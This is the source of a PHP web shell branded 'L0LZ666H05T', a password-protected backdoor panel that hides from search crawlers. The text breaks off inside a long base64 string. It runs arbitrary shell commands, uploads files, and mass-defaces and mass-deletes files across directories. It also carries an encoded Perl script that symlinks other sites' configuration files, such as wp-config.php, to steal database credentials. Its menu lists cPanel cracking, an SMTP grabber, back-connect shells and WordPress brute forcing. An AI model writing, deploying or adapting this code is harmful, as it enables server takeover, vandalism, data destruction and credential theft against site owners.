_.php

1. <?php
2. session_start();
3. error_reporting(0);
4. set_time_limit(0);
5. @set_magic_quotes_runtime(0);
6. @clearstatcache();
7. @ini_set('error_log',NULL);
8. @ini_set('log_errors',0);
9. @ini_set('max_execution_time',0);
10. @ini_set('output_buffering',0);
11. @ini_set('display_errors', 0);
12. $auth_pass = "3ca59964f419d01e2015ecdce37303d7" ;
13.  
14. $color = "#00ff00";
15. $default_action = 'FilesMan';
16. $default_use_ajax = true;
17. $default_charset = 'UTF-8';
18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
19. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
20. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
21. header('HTTP/1.0 404 Not Found');
22. exit;
23.  
24. <html>
25. <head>
26. <title>Shell Login</title>
27. <link href='http://img.deusm.com/darkreading/bh-asia-facebook-profile.png' rel='icon' type='image/x-icon'/>
28.  
29. <style type="text/css">
30. html {
31. margin: 20px auto;
32. background: black;
33. color: lime;
34. text-align: center;
35. }
36. header {
37. color: Dimgray;
38. margin: 10px auto;
39. }
40. input[type=password] {
41. width: 250px;
42. height: 25px;
43. color: Dimgray;
44. background: transparent;
45. border: 1px solid #0F6516;
46. padding: 5px;
47. margin-left: 20px;
48. text-align: center;
49. }
50. input:hover {
51. background: #222;
52. }
53. </style>
54. </head>
55. <body>
56. <center>
57. <link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
58.  
59. <style type="text/css">
60.  
61. </style>
62. <br><br><br><br><br><br><br><br><br><br>
63. <p><p><p><p><p><p><img style="width:290px;" src="http://lightpointsecurity.com/wp-content/uploads/2015/12/anonymous-browser-300x208.png" border="0">
64. <br><center><font color="white" face="iceland" size="8"><b>L0LZ66<font color="Dimgray">6H05T</font></b><br>
65. <form method="post">
66. <input type="password" name="pass">
67. </form>
68. <?php
69. exit;
70. }
71. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
72. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
73. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
74. else
75. login_shell();
76. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
77. @ob_clean();
78. $file = $_GET['file'];
79. header('Content-Description: File Transfer');
80. header('Content-Type: application/octet-stream');
81. header('Content-Disposition: attachment; filename="'.basename($file).'"');
82. header('Expires: 0');
83. header('Cache-Control: must-revalidate');
84. header('Pragma: public');
85. header('Content-Length: ' . filesize($file));
86. readfile($file);
87. exit;
88. }
89. ?>
90. <html>
91. <head>
92. <title>L0LZ666H05T</title>
93. <link href='http://lightpointsecurity.com/wp-content/uploads/2015/12/anonymous-browser-300x208.png' rel='icon' type='image/x-icon'/>
94. <meta name='author' content='RebellionGhost'>
95. <meta charset="UTF-8">
96. <style type='text/css'>
97. @import url(http://fonts.googleapis.com/css?family=Share+Tech+Mono);
98. html {
99. background: url('https://ak9.picdn.net/shutterstock/videos/10271399/thumb/1.jpg');
100. color: #ffffff;
101. font-family: 'Share Tech Mono';
102. font-size: 12px;
103. width: 100%;
104. }
105. li {
106. display: inline;
107. margin: 2px;
108. padding: 2px;
109. border:2px solid #0F6516;
110. width:80px;
111. padding:0px 8px 0px 8px;
112. background:#0F6516;
113. }
114. li:hover {
115. background: #198722;
116. border: 2px solid #198722;
117. color:gold;
118. margin: 0px;
119. }
120. .il {
121. margin: 2px;
122. padding:2px;
123. border:2px solid darkred;
124. color:red;
125. width:80px;
126. padding:0px 8px 0px 8px;
127. background:darkred;
128. }
129. .il:hover {
130. background: red;
131. border: 2px solid red;
132. color:darkred;
133. margin: 0px;
134. }
135.  
136. #menu{
137. background:#111111;
138. margin:9px 3px 4px 2px;
139. }
140. #menu a{
141. padding:4px 19px;
142. margin:0;
143. background:#222222;
144. text-decoration:none;
145. letter-spacing:2px;
146. -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
147.  
148. }
149. #menu a:hover{
150. background:#191919;
151. border-bottom:1px solid #333333;
152. border-top:1px solid #333333;
153. }
154. .explore tr:hover{background:#181818}
155. table tr:first-child{
156. background: #0F6516;
157. text-align: center;
158. color: white;
159. }
160. table, th, td {
161. border-collapse:collapse;
162. font-family: Tahoma, Geneva, sans-serif;
163. background: transparent;
164. font-family: 'Share Tech Mono';
165. font-size: 13px;
166. }
167. .table_home, .th_home, .td_home {
168. border: 1px solid #191919;
169. }
170. th {
171. padding: 10px;
172. }
173. tr:hover {
174. background: #0F6516;
175. }
176. a {
177. color: #ffffff;
178. text-decoration: none;
179. }
180. a:hover {
181. color: gold;
182. text-decoration: underline;
183. }
184. b {
185. color: dimgray;
186. }
187. input[type=text], input[type=password],input[type=submit] {
188. background: transparent;
189. color: #ffffff;
190. border: 1px solid #ffffff;
191. margin: 5px auto;
192. padding-left: 5px;
193. font-family: 'Share Tech Mono';
194. font-size: 13px;
195. }
196. input[type=submit] {
197. background: #191919;
198. color: #ffffff;
199. border: 1px solid #191919;
200. margin: 5px auto;
201. padding-left: 5px;
202. font-family: 'Share Tech Mono';
203. font-size: 13px;
204. cursor:pointer;
205. }
206. input:hover {
207. background: #222;
208. }
209. textarea {
210. border: 1px solid #191919;
211. width: 100%;
212. height: 400px;
213. padding-left: 5px;
214. margin: 10px auto;
215. resize: none;
216. background: #191919;
217. color: #ffffff;
218. font-family: 'Share Tech Mono';
219. font-size: 13px;
220. }
221. textarea:hover {
222. background: #222;
223. }
224. select {
225. width: 152px;
226. background: #000000;
227. color: dimgray;
228. border: 1px solid #ffffff;
229. margin: 5px auto;
230. padding-left: 5px;
231. font-family: 'Share Tech Mono';
232. font-size: 13px;
233. }
234. select:hover {
235. background: #222;
236. }
237. option:hover {
238. background: dimgray;
239. color: #000000;
240. }
241. .mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #ff0000; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #ff0000;-moz-box-shadow: 0px 4px 2px #ff0000;}
242. .cgx2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: #ff0000;font-size:25px;text-shadow: 5px 5px 5px black;}
243. .infoweb {
244. border-right: 1px solid #00FFFF;
245. }
246. .sad {
247. background: #222;
248. }
249.  
250. </style>
251. </head>
252. <?php
253. ###############################################################################
254.  
255. ###############################################################################
256. function w($dir,$perm) {
257. if(!is_writable($dir)) {
258. return "<font color=red>".$perm."</font>";
259. } else {
260. return "<font color=lime>".$perm."</font>";
261. }
262. }
263. function r($dir,$perm) {
264. if(!is_readable($dir)) {
265. return "<font color=red>".$perm."</font>";
266. } else {
267. return "<font color=lime>".$perm."</font>";
268. }
269. }
270. function exe($cmd) {
271. if(function_exists('system')) {
272. @ob_start();
273. @system($cmd);
274. $buff = @ob_get_contents();
275. @ob_end_clean();
276. return $buff;
277. } elseif(function_exists('exec')) {
278. @exec($cmd,$results);
279. $buff = "";
280. foreach($results as $result) {
281. $buff .= $result;
282. } return $buff;
283. } elseif(function_exists('passthru')) {
284. @ob_start();
285. @passthru($cmd);
286. $buff = @ob_get_contents();
287. @ob_end_clean();
288. return $buff;
289. } elseif(function_exists('shell_exec')) {
290. $buff = @shell_exec($cmd);
291. return $buff;
292. }
293. }
294. function perms($file){
295. $perms = fileperms($file);
296. if (($perms & 0xC000) == 0xC000) {
297. // Socket
298. $info = 's';
299. } elseif (($perms & 0xA000) == 0xA000) {
300. // Symbolic Link
301. $info = 'l';
302. } elseif (($perms & 0x8000) == 0x8000) {
303. // Regular
304. $info = '-';
305. } elseif (($perms & 0x6000) == 0x6000) {
306. // Block special
307. $info = 'b';
308. } elseif (($perms & 0x4000) == 0x4000) {
309. // Directory
310. $info = 'd';
311. } elseif (($perms & 0x2000) == 0x2000) {
312. // Character special
313. $info = 'c';
314. } elseif (($perms & 0x1000) == 0x1000) {
315. // FIFO pipe
316. $info = 'p';
317. } else {
318. // Unknown
319. $info = 'u';
320. }
321. // Owner
322. $info .= (($perms & 0x0100) ? 'r' : '-');
323. $info .= (($perms & 0x0080) ? 'w' : '-');
324. $info .= (($perms & 0x0040) ?
325. (($perms & 0x0800) ? 's' : 'x' ) :
326. (($perms & 0x0800) ? 'S' : '-'));
327. // Group
328. $info .= (($perms & 0x0020) ? 'r' : '-');
329. $info .= (($perms & 0x0010) ? 'w' : '-');
330. $info .= (($perms & 0x0008) ?
331. (($perms & 0x0400) ? 's' : 'x' ) :
332. (($perms & 0x0400) ? 'S' : '-'));
333. // World
334. $info .= (($perms & 0x0004) ? 'r' : '-');
335. $info .= (($perms & 0x0002) ? 'w' : '-');
336. $info .= (($perms & 0x0001) ?
337. (($perms & 0x0200) ? 't' : 'x' ) :
338. (($perms & 0x0200) ? 'T' : '-'));
339. return $info;
340. }
341. function hdd($s) {
342. if($s >= 1073741824)
343. return sprintf('%1.2f',$s / 1073741824 ).' GB';
344. elseif($s >= 1048576)
345. return sprintf('%1.2f',$s / 1048576 ) .' MB';
346. elseif($s >= 1024)
347. return sprintf('%1.2f',$s / 1024 ) .' KB';
348. else
349. return $s .' B';
350. }
351. function ambilKata($param, $kata1, $kata2){
352. if(strpos($param, $kata1) === FALSE) return FALSE;
353. if(strpos($param, $kata2) === FALSE) return FALSE;
354. $start = strpos($param, $kata1) + strlen($kata1);
355. $end = strpos($param, $kata2, $start);
356. $return = substr($param, $start, $end - $start);
357. return $return;
358. }
359. function getsource($url) {
360. $curl = curl_init($url);
361. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
362. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
363. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
364. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
365. $content = curl_exec($curl);
366. curl_close($curl);
367. return $content;
368. }
369. function bing($dork) {
370. $npage = 1;
371. $npages = 30000;
372. $allLinks = array();
373. $lll = array();
374. while($npage <= $npages) {
375. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
376. if($x) {
377. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
378. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
379. $npage = $npage + 10;
380. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
381. } else break;
382. }
383. $URLs = array();
384. foreach($allLinks as $url){
385. $exp = explode("/", $url);
386. $URLs[] = $exp[2];
387. }
388. $array = array_filter($URLs);
389. $array = array_unique($array);
390. $sss = count(array_unique($array));
391. foreach($array as $domain) {
392. echo $domain."\n";
393. }
394. }
395. function reverse($url) {
396. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
397. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
398. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
399. curl_setopt($ch, CURLOPT_HEADER, 0);
400. curl_setopt($ch, CURLOPT_POST, 1);
401. $resp = curl_exec($ch);
402. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
403. $array = explode(",,", $resp);
404. unset($array[0]);
405. foreach($array as $lnk) {
406. $lnk = "http://$lnk";
407. $lnk = str_replace(",", "", $lnk);
408. echo $lnk."\n";
409. ob_flush();
410. flush();
411. }
412. curl_close($ch);
413. }
414. if(get_magic_quotes_gpc()) {
415. function idx_ss($array) {
416. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
417. }
418. $_POST = idx_ss($_POST);
419. $_COOKIE = idx_ss($_COOKIE);
420. }
421.  
422. if(isset($_GET['dir'])) {
423. $dir = $_GET['dir'];
424. chdir($dir);
425. } else {
426. $dir = getcwd();
427. }
428. $kernel = php_uname();
429. $ip = gethostbyname($_SERVER['HTTP_HOST']);
430. $dir = str_replace("\\","/",$dir);
431. $scdir = explode("/", $dir);
432. $freespace = hdd(disk_free_space("/"));
433. $total = hdd(disk_total_space("/"));
434. $used = $total - $freespace;
435. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
436. $ds = @ini_get("disable_functions");
437. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
438. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
439. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
440. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
441. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
442. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
443. if(!function_exists('posix_getegid')) {
444. $user = @get_current_user();
445. $uid = @getmyuid();
446. $gid = @getmygid();
447. $group = "?";
448. } else {
449. $uid = @posix_getpwuid(posix_geteuid());
450. $gid = @posix_getgrgid(posix_getegid());
451. $user = $uid['name'];
452. $uid = $uid['uid'];
453. $group = $gid['name'];
454. $gid = $gid['gid'];
455. }
456. echo "System: <font color=lime>".$kernel."</font><br>";
457. echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
458. echo "Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
459. echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
460. echo "Safe Mode: $sm<br>";
461. echo "Disable Functions: $show_ds<br>";
462. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
463. echo "<hr color='Dimgray'>";
464. echo "<center>";
465. echo "<br><link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'><font face='iceland'size='7'>&#10075; L0LZ66</font><font face='iceland' size='7' color='Dimgray'>6H05T &#10076;</font>";
466. echo "<ul><font face='iceland' size='3.8' color='dimgray'>";
467.  
468. echo "<li> <a style='' href='?'>Home</a> </li>";
469. echo "<li> <a style='' href='?dir=$dir&do=upload'>Upload</a> </li>";
470. echo "<li> <a style='' href='?dir=$dir&do=cmd'>Command</a> </li>";
471. echo "<li> <a style='' href='?dir=$dir&do=mass_deface'>Mass Deface</a> </li>";
472. echo "<li> <a style='' href='?dir=$dir&do=mass_delete'>Mass Delete</a> </li>";
473. echo "<li> <a style='' href='?dir=$dir&do=config'>Config</a> </li>";
474. echo "<li> <a style='' href='?dir=$dir&do=jumping'>Jumping</a> </li>";
475. echo "<li> <a style='' href='?dir=$dir&do=cpanel'>CPanel Crack</a> </li>";
476. echo "<li> <a style='' href='?dir=$dir&do=smtp'>SMTP Grabber</a> </li>";
477. echo "<li> <a style='' href='?dir=$dir&do=zoneh'>Zone-H</a> </li>";
478. echo "<li> <a style='' href='?dir=$dir&do=cgi'>CGI Telnet</a> </li>";
479. echo "<li> <a style='' href='?dir=$dir&do=network'>network</a> </li>";
480. echo "<li> <a style='' href='?dir=$dir&do=adminer'>Adminer</a> </li>";
481. echo "<p>";
482. echo "<li> <a style='' href='?dir=$dir&do=fake_root'>Fake Root</a> </li>";
483. echo "<li> <a style='' href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> </li>";
484. echo "<li> <a style='' href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> </li>";
485. echo "<li> <a style='' href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> </li>";
486. echo "<li> <a style='' href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> </li>";
487. echo "<li> <a style='' href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> </li>";
488. echo "<li> <a style='' href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> </li>";
489. echo "<p>";
490. echo "<li> <a style='' href='?dir=$dir&do=defacerid'>DefacerID</a> </li>";
491. echo "<li> <a style='' href='?dir=$dir&do=csrf'>CSRF Online</a> </li>";
492. echo "<li> <a style='' href='?dir=$dir&do=backconnect'>Back Connect</a> </li>";
493. echo "<li> <a style='' href='?dir=$dir&do=wpbf'>WordPress Brute</a> </li>";
494. echo "<li> <a style='' href='?dir=$dir&do=hashid'>Hash Identification</a> </li>";
495. echo "<li> <a style='' href='?dir=$dir&do=symlink'>Symlink</a> </li>";
496. echo "<li> <a style='' href='?dir=$dir&do=passwbypass'>Bypass Etc/Passw</a> </li>";
497. echo "<li> <a style='' href='?dir=$dir&do=dbdump'>DB Dump</a> </li>";
498. echo " <a class='il' href='?logout=true'>Logout</a><p>";
499.  
500. echo "<font size'5'>Current DIR: ";
501. foreach($scdir as $c_dir => $cdir) {
502. echo "<a href='?dir=";
503. for($i = 0; $i <= $c_dir; $i++) {
504. echo $scdir[$i];
505. if($i != $c_dir) {
506. echo "/";
507. }
508. }
509. echo "'>$cdir</a>/";
510. }
511. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
512. echo "</font></ul>";
513. echo "</center>";
514. echo "<hr color='Dimgray'>";
515. if($_GET['logout'] == true) {
516. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
517. echo "<script>window.location='?';</script>";
518. } elseif($_GET['do'] == 'upload') {
519. echo "<center>";
520. if($_POST['upload']) {
521. if($_POST['tipe_upload'] == 'biasa') {
522. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
523. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
524. } else {
525. $act = "<font color=red>failed to upload file</font>";
526. }
527. } else {
528. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
529. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
530. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
531. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
532. $act = "<font color=lime>Upload sukses</font> &#10139; <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
533. } else {
534. $act = "<font color=red>failed to upload file</font>";
535. }
536. } else {
537. $act = "<font color=red>failed to upload file</font>";
538. }
539. }
540. }
541. echo "Upload File:
542. <form method='post' enctype='multipart/form-data'>
543. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
544. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
545. <input type='file' name='ix_file'>
546. <input type='submit' value='upload' name='upload'>
547. </form>";
548. echo $act;
549. echo "</center>";
550. } elseif($_GET['do'] == 'cmd') {
551. echo "<form method='post'>
552. <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
553. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
554. </form>";
555. if($_POST['do_cmd']) {
556. echo "<pre>".exe($_POST['cmd'])."</pre>";
557. }
558. } elseif($_GET['do'] == 'mass_deface') {
559. function sabun_massal($dir,$namafile,$isi_script) {
560. if(is_writable($dir)) {
561. $dira = scandir($dir);
562. foreach($dira as $dirb) {
563. $dirc = "$dir/$dirb";
564. $lokasi = $dirc.'/'.$namafile;
565. if($dirb === '.') {
566. file_put_contents($lokasi, $isi_script);
567. } elseif($dirb === '..') {
568. file_put_contents($lokasi, $isi_script);
569. } else {
570. if(is_dir($dirc)) {
571. if(is_writable($dirc)) {
572. echo "[<font color=lime>DONE</font>] $lokasi<br>";
573. file_put_contents($lokasi, $isi_script);
574. $idx = sabun_massal($dirc,$namafile,$isi_script);
575. }
576. }
577. }
578. }
579. }
580. }
581. function sabun_biasa($dir,$namafile,$isi_script) {
582. if(is_writable($dir)) {
583. $dira = scandir($dir);
584. foreach($dira as $dirb) {
585. $dirc = "$dir/$dirb";
586. $lokasi = $dirc.'/'.$namafile;
587. if($dirb === '.') {
588. file_put_contents($lokasi, $isi_script);
589. } elseif($dirb === '..') {
590. file_put_contents($lokasi, $isi_script);
591. } else {
592. if(is_dir($dirc)) {
593. if(is_writable($dirc)) {
594. echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
595. file_put_contents($lokasi, $isi_script);
596. }
597. }
598. }
599. }
600. }
601. }
602. if($_POST['start']) {
603. if($_POST['tipe_sabun'] == 'mahal') {
604. echo "<div style='margin: 5px auto; padding: 5px'>";
605. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
606. echo "</div>";
607. } elseif($_POST['tipe_sabun'] == 'murah') {
608. echo "<div style='margin: 5px auto; padding: 5px'>";
609. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
610. echo "</div>";
611. }
612. } else {
613. echo "<center>";
614. echo "<form method='post'>
615. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
616. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
617. <font style='text-decoration: underline;'>Folder:</font><br>
618. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
619. <font style='text-decoration: underline;'>Filename:</font><br>
620. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
621. <font style='text-decoration: underline;'>Index File:</font><br>
622. <textarea name='script' style='width: 450px; height: 200px;'>HACKED BY L0LZ666H05T</textarea><br>
623. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
624. </form></center>";
625. }
626. } elseif($_GET['do'] == 'mass_delete') {
627. function hapus_massal($dir,$namafile) {
628. if(is_writable($dir)) {
629. $dira = scandir($dir);
630. foreach($dira as $dirb) {
631. $dirc = "$dir/$dirb";
632. $lokasi = $dirc.'/'.$namafile;
633. if($dirb === '.') {
634. if(file_exists("$dir/$namafile")) {
635. unlink("$dir/$namafile");
636. }
637. } elseif($dirb === '..') {
638. if(file_exists("".dirname($dir)."/$namafile")) {
639. unlink("".dirname($dir)."/$namafile");
640. }
641. } else {
642. if(is_dir($dirc)) {
643. if(is_writable($dirc)) {
644. if(file_exists($lokasi)) {
645. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
646. unlink($lokasi);
647. $idx = hapus_massal($dirc,$namafile);
648. }
649. }
650. }
651. }
652. }
653. }
654. }
655. if($_POST['start']) {
656. echo "<div style='margin: 5px auto; padding: 5px'>";
657. hapus_massal($_POST['d_dir'], $_POST['d_file']);
658. echo "</div>";
659. } else {
660. echo "<center>";
661. echo "<form method='post'>
662. <font style='text-decoration: underline;'>Folder:</font><br>
663. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
664. <font style='text-decoration: underline;'>Filename:</font><br>
665. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
666. <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
667. </form></center>";
668. }
669. } elseif($_GET['do'] == 'config') {
670. $idx = mkdir("L0LZ666H05T_config", 0777);
671. $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGInRequire NonenSatisfy AnynAddType application/x-httpd-cgi .cinnAddHandler cgi-script .cinnAddHandler cgi-script .cin";
672. $htc = fopen("L0LZ666H05T_config/.htaccess","w");
673. fwrite($htc, $isi_htc);
674. fclose($htc);
675. if(preg_match("/vhosts|vhost/", $dir)) {
676. $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
677. $vhost = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOw0KZm9yZWFjaChzb3J0IHJlYWRkaXIgJGRpcikgew0KICAgIG15ICRpc0RpciA9IDA7DQogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsNCiRzaXRlc3MgPSAkXzsNCg0KDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atb3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2UudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2VzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NhbGUvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNhbGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXJzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictbWVtYmVycy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictNC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dwL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV1Avd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLVdvcmRwcmVzcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd29yZHByZXNzLn